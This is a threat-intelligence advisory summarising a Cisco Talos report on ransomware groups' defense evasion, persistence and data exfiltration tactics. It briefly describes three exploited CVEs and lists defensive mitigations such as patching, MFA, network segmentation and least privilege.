Ransomware Groups Prioritize Defense Evasion for Data Exfiltration

Summary:
Ransomware attackers are increasingly focusing on defense evasion tactics to extend their dwell time within victim networks, as highlighted in a new report by Cisco Talos. This shift is primarily driven by the double-extortion ransomware model, where attackers steal sensitive data and threaten to publish it online while locking down victims’ systems. Attackers aim to gain persistent access to understand the network structure, locate valuable resources, and identify data that can be stolen. The Cisco Talos report analyzed the tactics, techniques, and procedures of the 14 most active ransomware groups from 2023 to 2024.

To evade detection, ransomware groups disable and modify security software, obfuscate malicious software by packing and compressing the code, modify the system registry to disable security alerts, configure software to execute at startup, and block certain recovery options for users. Persistence techniques include the use of automated malware persistence mechanisms and the creation of remote access software tools. Attackers exploit weak access controls and elevate privileges using local utilities and legitimate services, employing "living-off-the-land" techniques that blend in with typical OS functions. This involves using network scanner utilities and local operating system tools like Certutil, Wevtutil, Net, Nltes, and Netsh.

After gaining persistent access, attackers locate and exfiltrate sensitive data before deploying the ransomware payload. They use compression and encryption utilities such as WinRAR and 7-Zip to conceal data exfiltration. Ransomware-as-a-service (RaaS) groups, like LockBit, even use custom data exfiltration tools such as StealBit. Increasingly, attackers exploit known and zero-day vulnerabilities in public-facing applications for initial access, which can also enable privilege escalation and persistent access. Cisco Talos highlighted three repeatedly exploited vulnerabilities: CVE-2020-1472 (Zerologon), CVE-2018-13379, and CVE-2023-0669.

Security Officer Comments:
CVE-2020-1472, or Zerologon, allows attackers to bypass authentication and escalate privileges within a domain controller's Active Directory. CVE-2018-13379, a flaw in Fortinet's FortiOS SSL VPN, permits access to system files and sensitive information, enabling lateral movement. CVE-2023-0669, a GoAnywhere Managed File Transfer flaw, allows remote code execution on the server without authentication, facilitating further internal reconnaissance and lateral movement.

Suggested Corrections:
Cisco highlighted key steps organizations should take to mitigate the TTPs employed by ransomware groups. These are:

  • Apply patches and updates regularly to all systems and software
  • Implement strong password policies and enforce multi-factor authentication (MFA) for each account
  • Minimize attack surfaces by disabling unnecessary services and features, and apply best practices to harden all systems and environments
  • Segment networks using VLANs or similar technologies to isolate sensitive data and systems, thereby preventing lateral movement
  • Implement a Security Information and Event Management (SIEM) system to continuously monitor and analyze security events
  • Adopt a least-privilege approach, ensuring that users and systems have only the minimal level of access necessary to perform their functions
  • Minimize your IT systems’ exposure to the internet y limiting the number of public-facing services and ensuring robust protections for any necessary external interfaces

Link(s):
https://www.infosecurity-magazine.com/news/ransomware-defense-evasion-data/